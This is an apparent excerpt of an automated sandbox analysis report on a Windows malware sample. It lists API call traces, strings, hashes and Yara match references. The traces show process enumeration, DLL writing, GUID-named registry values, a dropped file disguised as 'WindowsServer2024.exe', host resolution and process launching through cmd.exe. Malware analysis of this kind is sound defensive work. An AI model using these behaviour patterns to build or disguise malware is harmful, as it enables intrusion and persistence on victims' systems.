                                                                            • String ID: %s\cmd.exe
                                                                            • API String ID: 4247545968-923833829
                                                                            • Opcode ID: 544cc6db9f6e7d74e553801148a9a2e640239086b29a669a2101a8fea773530d
                                                                            • Instruction ID: 63feee36bb24d47ee99e6fc45ffa436789be19c77a8b8c3d510cd5f66ac4c772
                                                                            • Opcode Fuzzy Hash: 544cc6db9f6e7d74e553801148a9a2e640239086b29a669a2101a8fea773530d
                                                                            • Instruction Fuzzy Hash: 22211075E00309FBDB10ABF4DC4AFBE7775AF48B01F108568F605A6291DB789A01CB18
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,00000FA0), ref: 007D0607
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D0C5A
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D0C70
                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 007D0C8D
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal$AllocVirtual
                                                                            • String ID: @$_DllMain@12
                                                                            • API String ID: 631462101-1064695914
                                                                            • Opcode ID: d07cf10936163be229a583f48caa00eb5307fd2af1994d8e2222bdf729682666
                                                                            • Instruction ID: abdb656eeb26b5abeb3e485f7cb111f7b6c5681f9a5ee30a7cbfd8c2ffd241de
                                                                            • Opcode Fuzzy Hash: d07cf10936163be229a583f48caa00eb5307fd2af1994d8e2222bdf729682666
                                                                            • Instruction Fuzzy Hash: 18228A74A05228CBDB25CF18CD94BE9B7B1BF89309F1491DAD509AB351DB35AE81CF80
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,?), ref: 007C2694
                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 007C26B2
                                                                            • Process32FirstW.KERNEL32(00000000,0000022C), ref: 007C26DA
                                                                            • lstrcmpiW.KERNEL32(?,-00832F28,00000000,?,?,?,?,?), ref: 007C278C
                                                                            • _memset.LIBCMT ref: 007C27B1
                                                                            • lstrcpyW.KERNEL32(?,-00832F28,?,?,?,?,?,?,?), ref: 007C27CF
                                                                              • Part of subcall function 007C1C60: _wcsrchr.LIBCMT ref: 007C1C6C
                                                                            • lstrcpyW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 007C2815
                                                                              • Part of subcall function 007C2A80: construct.LIBCPMTD ref: 007C2B09
                                                                            • StrCatW.SHLWAPI(00000000,007F2714), ref: 007C2863
                                                                            • StrCatW.SHLWAPI(00000000,?), ref: 007C2874
                                                                            • Process32NextW.KERNEL32(00000000,0000022C), ref: 007C28D6
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007C28E8
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C28F8
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LocalProcess32lstrcpy$AllocCloseCreateFirstFreeHandleNextSnapshotToolhelp32_memset_wcsrchrconstructlstrcmpi
                                                                            • String ID: A#v
                                                                            • API String ID: 4081567023-4158731453
                                                                            • Opcode ID: f05a604fa7706ad1ef7fad623879af459267250acbbc175dc21cf62bb45b119c
                                                                            • Instruction ID: 9a841f8d6fced7fc7cae1d087bea972996048fbf7004668edca9161355181659
                                                                            • Opcode Fuzzy Hash: f05a604fa7706ad1ef7fad623879af459267250acbbc175dc21cf62bb45b119c
                                                                            • Instruction Fuzzy Hash: 3C812DB1904218DBDB14DBA4CC89FEEB7B4BF98700F00459DE116B7291EB786A49CF64
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,007C6D26,?,007C6D8A,00000000,00000000,?), ref: 007C9416
                                                                            • _memmove.LIBCMT ref: 007C9435
                                                                            • lstrcpyW.KERNEL32(?,00000000,00000000,00000000), ref: 007C94FF
                                                                            • StrStrIW.SHLWAPI(?,.DLL), ref: 007C9511
                                                                            • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 007C953C
                                                                            • WriteFile.KERNEL32(?,00000000,?,?,00000000), ref: 007C9569
                                                                            • CloseHandle.KERNEL32(?), ref: 007C9581
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C958B
                                                                            • CloseHandle.KERNEL32(?), ref: 007C959F
                                                                            • LocalFree.KERNEL32(00000000), ref: 007C95C9
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$CloseFileFreeHandle$AllocCreateWrite_memmovelstrcpy
                                                                            • String ID: .DLL
                                                                            • API String ID: 1779380834-899428287
                                                                            • Opcode ID: 18b60baa27d11729542b5dd7b359a62c632de33c7d437dd94b270be729ecc6e2
                                                                            • Instruction ID: e2406fe45d0d947af44cb1848f9209be7ad2d263cb696aea06149c45acbd4b45
                                                                            • Opcode Fuzzy Hash: 18b60baa27d11729542b5dd7b359a62c632de33c7d437dd94b270be729ecc6e2
                                                                            • Instruction Fuzzy Hash: 5E512A75A00208EBCB25CF98DC48FD9B7B5BB8C310F108999F649A7290DBB4DA81DF54
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 007D6A7A
                                                                            • __snwprintf.LIBCMT ref: 007D6A9F
                                                                              • Part of subcall function 007CA680: _memset.LIBCMT ref: 007CA6BF
                                                                              • Part of subcall function 007CA680: _memset.LIBCMT ref: 007CA70A
                                                                              • Part of subcall function 007CA680: CoInitializeEx.COMBASE(00000000,00000000), ref: 007CA754
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D6AD9
                                                                            • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 007D6B24
                                                                            • CreateThread.KERNEL32(00000000,00000000,007CF100,00000000,00000000,00000000), ref: 007D6B47
                                                                            • CloseHandle.KERNEL32(00000000), ref: 007D6B64
                                                                            • WSAStartup.WS2_32(00000002,?), ref: 007D6B73
                                                                            • CreateThread.KERNEL32(00000000,00000000,007DB630,00000000,00000000,00000000), ref: 007D6B95
                                                                            • CreateThread.KERNEL32(00000000,00000000,007E1030,00000000,00000000,00000000), ref: 007D6BAF
                                                                              • Part of subcall function 007DC3A0: AllocateAndInitializeSid.ADVAPI32(00000000,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 007DC3DB
                                                                              • Part of subcall function 007DC3A0: CheckTokenMembership.ADVAPI32(00000000,?,00000000), ref: 007DC3F4
                                                                              • Part of subcall function 007DC3A0: FreeSid.ADVAPI32(?), ref: 007DC409
                                                                            • WSACleanup.WS2_32 ref: 007D6BCA
                                                                              • Part of subcall function 007CFE20: SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 007CFE74
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(?), ref: 007CFE86
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(00831110), ref: 007CFE99
                                                                              • Part of subcall function 007CFE20: LocalAlloc.KERNEL32(00000040,?), ref: 007CFEB2
                                                                              • Part of subcall function 007CFE20: __snwprintf.LIBCMT ref: 007CFEDA
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(00000000), ref: 007CFEE6
                                                                              • Part of subcall function 007CFE20: CoTaskMemFree.COMBASE(?), ref: 007CFEF5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Create$FreeThread_memsetlstrlen$InitializeLocal__snwprintf$AllocAllocateCheckCleanupCloseEventFolderHandleKnownMembershipPathStartupTaskToken
                                                                            • String ID: "%s%s"$WindowsServer2024$WindowsServer2024$WindowsServer2024.exe${741330C7-73F4-49B6-9258-6679317DED46}
                                                                            • API String ID: 3184904793-50802693
                                                                            • Opcode ID: 4442ab324ad96478cf1f7a688b5574775c017c50181d19dca8fd516bfc8654db
                                                                            • Instruction ID: ef65b553814f57b4904844229be6dbacb53b3653fd1c073bfb689bce3b07175f
                                                                            • Opcode Fuzzy Hash: 4442ab324ad96478cf1f7a688b5574775c017c50181d19dca8fd516bfc8654db
                                                                            • Instruction Fuzzy Hash: 4841A471A40314EBEB209B60DC4BFA53374B795B05F14445AF309BA3D1E6F85984CF56
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D3364
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007D3385
                                                                            • SHGetKnownFolderPath.SHELL32(007F7C30,00000000,00000000,00000000), ref: 007D33AC
                                                                            • lstrlenW.KERNEL32(00000000), ref: 007D33BA
                                                                            • __snwprintf.LIBCMT ref: 007D33E4
                                                                            • __snwprintf.LIBCMT ref: 007D33FE
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D340A
                                                                            • CoTaskMemFree.COMBASE(00000000), ref: 007D3414
                                                                            • CoTaskMemFree.COMBASE(00000000), ref: 007D3423
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D342D
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D3437
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FreeLocal$AllocTask__snwprintf$FolderKnownPathlstrlen
                                                                            • String ID: %s\System32$\\?\%s
                                                                            • API String ID: 2558432158-2868705786
                                                                            • Opcode ID: ed283b278728a41b0e841a9f01d448b2b987ae2f680898eb7bf5a09e224fe0d1
                                                                            • Instruction ID: 1215fe4b4e667ee02dba20211420bbfe23ed01d80f908085de419ec5f930f144
                                                                            • Opcode Fuzzy Hash: ed283b278728a41b0e841a9f01d448b2b987ae2f680898eb7bf5a09e224fe0d1
                                                                            • Instruction Fuzzy Hash: 7021EDB5E40208FBDB14DBE4DC49BAEBB75BF48700F108999F611A7290DB785A40DB51
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,-00000001,?,007DB8E1,00000000,00000000,0083D2C8,0083D370), ref: 007DB9AF
                                                                            • _memmove.LIBCMT ref: 007DB9CE
                                                                            • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,007DB8E1,00000000,00000000), ref: 007DB9F4
                                                                            • inet_addr.WS2_32(00000000), ref: 007DBA14
                                                                            • gethostbyname.WS2_32(00000000), ref: 007DBA27
                                                                            • LocalFree.KERNEL32(00000000,?,?,?,?,?,?,007DB8E1,00000000), ref: 007DBA3A
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Alloc_memmovegethostbynameinet_addr
                                                                            • String ID:
                                                                            • API String ID: 3088692038-0
                                                                            • Opcode ID: ca964205d48fa5b71a79b587e3b11c6b486d00efeb45176fe84fa685204d1f25
                                                                            • Instruction ID: 12f2948c231b627998274f59959ef4cfaad1cbc370cb0432f9d6d401b418928c
                                                                            • Opcode Fuzzy Hash: ca964205d48fa5b71a79b587e3b11c6b486d00efeb45176fe84fa685204d1f25
                                                                            • Instruction Fuzzy Hash: 44410AB5A00208EFCB04DFA4D888BAEB7B5FF8C304F108559F906A7391D7799A41DB54
                                                                            APIs
                                                                            • SHGetKnownFolderPath.SHELL32(007F7C00,00000000,00000000,007D5BB2,?,?,?,?,?,?,?,?,?,?,?,007D5BB2), ref: 007D2E13
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE,?,?,?,?,?,?,?,?,?,?,?,007D5BB2), ref: 007D2E28
                                                                            • __snwprintf.LIBCMT ref: 007D2E61
                                                                            • lstrlenW.KERNEL32(00000000), ref: 007D2E6D
                                                                            • _memset.LIBCMT ref: 007D2E97
                                                                            • GetFileAttributesW.KERNEL32(00000000), ref: 007D2EC0
                                                                            • SHFileOperationW.SHELL32(?), ref: 007D2ED7
                                                                            • LocalFree.KERNEL32(00000000), ref: 007D2EFD
                                                                            • CoTaskMemFree.COMBASE(007D5BB2), ref: 007D2F07
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileFreeLocal$AllocAttributesFolderKnownOperationPathTask__snwprintf_memsetlstrlen
                                                                            • String ID: %s\%s${206629A6-BF8E-426E-AEC4-88B3A8712196}
                                                                            • API String ID: 561441633-3959428754
                                                                            • Opcode ID: 51adc60179a79d27074bf7278b7ada5f38684ad4a588c041b658c78b86c32419
                                                                            • Instruction ID: 7838af07df9b2fc3e1d422da0a342493bf1d8ff0ccd55978dce351249d822295
                                                                            • Opcode Fuzzy Hash: 51adc60179a79d27074bf7278b7ada5f38684ad4a588c041b658c78b86c32419
                                                                            • Instruction Fuzzy Hash: 10318D75E00208EBDB04DBA4DC49BBEBB75FF98700F108969F501A7391E7789A42CB50
                                                                            APIs
                                                                            • SetEvent.KERNEL32(00000000,?,007DBE80), ref: 007D6BFC
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,007DBE80), ref: 007D6C14
                                                                            • CloseHandle.KERNEL32(00000000,?,007DBE80), ref: 007D6C2A
                                                                            • SetEvent.KERNEL32(00000000,?,007DBE80), ref: 007D6C3F
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,007DBE80), ref: 007D6C57
                                                                            • CloseHandle.KERNEL32(00000000,?,007DBE80), ref: 007D6C6D
                                                                            • CloseHandle.KERNEL32(00000000,?,007DBE80), ref: 007D6C82
                                                                            • SetEvent.KERNEL32(00000000,?,007DBE80), ref: 007D6C98
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,007DBE80), ref: 007D6CB0
                                                                            • CloseHandle.KERNEL32(00000000,?,007DBE80), ref: 007D6CC5
                                                                            • SetEvent.KERNEL32(00000000,?,007DBE80), ref: 007D6CDB
                                                                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,007DBE80), ref: 007D6CF3
                                                                            • CloseHandle.KERNEL32(00000000,?,007DBE80), ref: 007D6D08
                                                                            • CloseHandle.KERNEL32(00000000,?,007DBE80), ref: 007D6D1E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandle$EventObjectSingleWait
                                                                            • String ID:
                                                                            • API String ID: 2857295742-0
                                                                            • Opcode ID: 495fc0ee682a947243fbe8c43b1e7c0822e56ff710e7cd74a255639ecb3c2518
                                                                            • Instruction ID: bdcd930325dc95647436890ef668aa7bf6f1fa34dbec29c8520f5938c8a36038
                                                                            • Opcode Fuzzy Hash: 495fc0ee682a947243fbe8c43b1e7c0822e56ff710e7cd74a255639ecb3c2518
                                                                            • Instruction Fuzzy Hash: 0831D572114200DBD3289B68FC8DB613776F394316F508A19E16A623F1DB7CA885CF18
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 007CB5C0
                                                                            • _memset.LIBCMT ref: 007CB5DF
                                                                              • Part of subcall function 007CFE20: SHGetKnownFolderPath.SHELL32(?,00000000,00000000,?), ref: 007CFE74
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(?), ref: 007CFE86
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(00831110), ref: 007CFE99
                                                                              • Part of subcall function 007CFE20: LocalAlloc.KERNEL32(00000040,?), ref: 007CFEB2
                                                                              • Part of subcall function 007CFE20: __snwprintf.LIBCMT ref: 007CFEDA
                                                                              • Part of subcall function 007CFE20: lstrlenW.KERNEL32(00000000), ref: 007CFEE6
                                                                              • Part of subcall function 007CFE20: CoTaskMemFree.COMBASE(?), ref: 007CFEF5
                                                                            • __snwprintf.LIBCMT ref: 007CB626
                                                                            • __snwprintf.LIBCMT ref: 007CB64B
                                                                            • DeleteFileW.KERNEL32(?), ref: 007CB65A
                                                                            • RemoveDirectoryW.KERNEL32(00000000), ref: 007CB66C
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CB67E
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CB692
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 007CB69F
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 007CB6B5
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: FileFreeLocal__snwprintflstrlen$Attributes_memset$AllocDeleteDirectoryFolderKnownPathRemoveTask
                                                                            • String ID: %s%s$WindowsServer2024.exe
                                                                            • API String ID: 4117469550-1924646418
                                                                            • Opcode ID: 43549866434d0b96479128969541b14f1797629f1b8e2020d28f3413134b6c32
                                                                            • Instruction ID: 2d0cbc8a0a96eab06b7de5dbd38e9b22fca395ce97615c098a1c862ca97851f6
                                                                            • Opcode Fuzzy Hash: 43549866434d0b96479128969541b14f1797629f1b8e2020d28f3413134b6c32
                                                                            • Instruction Fuzzy Hash: 342167B19402189BCB50D774DC8EFE97735AB54700F500ADCF619E62D1EB799EC48BA0
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 007C9FF4
                                                                            • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 007CA00A
                                                                              • Part of subcall function 007DC570: CreateFileW.KERNELBASE(?,80000000,00000001,00000000,00000003,00000080,00000000,?,007D430B,?,00000000), ref: 007DC58C
                                                                              • Part of subcall function 007DC570: GetFileSize.KERNEL32(000000FF,00000000,?,007D430B,?), ref: 007DC5A1
                                                                              • Part of subcall function 007DC570: LocalAlloc.KERNELBASE(00000040,000000FF,?,007D430B), ref: 007DC5B6
                                                                              • Part of subcall function 007DC570: ReadFile.KERNELBASE(000000FF,00000000,000000FF,?,00000000), ref: 007DC5D7
                                                                              • Part of subcall function 007DC570: CloseHandle.KERNELBASE(000000FF), ref: 007DC5ED
                                                                            • __snwprintf.LIBCMT ref: 007CA057
                                                                            • RegOpenKeyW.ADVAPI32(80000001,?,?), ref: 007CA072
                                                                            • RegSetValueExW.ADVAPI32(?,{CE0CD485-D472-437F-80D7-DAF95EA046F4},00000000,00000003,00000000,00000000), ref: 007CA09A
                                                                            • RegCloseKey.ADVAPI32(?), ref: 007CA0AB
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CA0B8
                                                                            • RegCloseKey.ADVAPI32(?), ref: 007CA0CC
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CA0D9
                                                                            Strings
                                                                            • {DE7C4D5F-E773-43F0-B029-ED407FF538E8}, xrefs: 007CA041
                                                                            • {CE0CD485-D472-437F-80D7-DAF95EA046F4}, xrefs: 007CA08E
                                                                            • SOFTWARE\%s, xrefs: 007CA046
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: File$CloseLocal$Free$AllocCreateHandleModuleNameOpenReadSizeValue__snwprintf_memset
                                                                            • String ID: SOFTWARE\%s${CE0CD485-D472-437F-80D7-DAF95EA046F4}${DE7C4D5F-E773-43F0-B029-ED407FF538E8}
                                                                            • API String ID: 3609211549-896602482
                                                                            • Opcode ID: ff57703f8d6b642697b50eefb4e2f254c7454214e50083a70acef78b822ccc0e
                                                                            • Instruction ID: 75bdc3cf5c3e4fc4b9cac35b64260db820fe165bb190f6fe6a4d72fa9d23ecd5
                                                                            • Opcode Fuzzy Hash: ff57703f8d6b642697b50eefb4e2f254c7454214e50083a70acef78b822ccc0e
                                                                            • Instruction Fuzzy Hash: 9D2182B5A40318ABD720DB60DC4DFEA7778BB54704F0049D8B619A6181EBB89A848FA1
                                                                            APIs
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CA560
                                                                            • GetSystemDirectoryW.KERNEL32(00000000,00007FFF), ref: 007CA57C
                                                                            • LocalAlloc.KERNEL32(00000040,0000FFFE), ref: 007CA591
                                                                              • Part of subcall function 007D79F0: lstrlenW.KERNEL32(?,?,?,?,?,?,?,007D68E6,007F47E8), ref: 007D7A19
                                                                            • __snwprintf.LIBCMT ref: 007CA5DD
                                                                            • _memset.LIBCMT ref: 007CA5F0
                                                                            • CreateProcessW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?), ref: 007CA637
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CA646
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CA650
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CA661
                                                                            • LocalFree.KERNEL32(00000000), ref: 007CA66B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.2118958124.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                                            • Associated: 00000000.00000002.2118942252.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118983457.00000000007F2000.00000002.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2118997582.00000000007FC000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119018976.0000000000831000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000832000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119031397.0000000000836000.00000008.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119057772.000000000083A000.00000004.00000001.01000000.00000003.sdmp
                                                                            • Associated: 00000000.00000002.2119074359.0000000000840000.00000002.00000001.01000000.00000003.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7c0000_file.jbxd
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: Local$Free$Alloc$CreateDirectoryProcessSystem__snwprintf_memsetlstrlen
                                                                            • String ID: D
                                                                            • API String ID: 2329958830-2746444292
                                                                            • Opcode ID: 8d7d0e840a0fb39ffe16e139e5212723000ca31be9697b152a403b93f315e8eb
                                                                            • Instruction ID: ebe33ecfaf1f4a9c17bd854aa056ab0ae771e7ac14f0e28d1e58b4a367341b24
                                                                            • Opcode Fuzzy Hash: 8d7d0e840a0fb39ffe16e139e5212723000ca31be9697b152a403b93f315e8eb
                                                                            • Instruction Fuzzy Hash: B63141B5A40208FBDB10DBA4DC8DFED7B78BF88701F1045A8F605BB290DA755A84CB50
                                                                            APIs
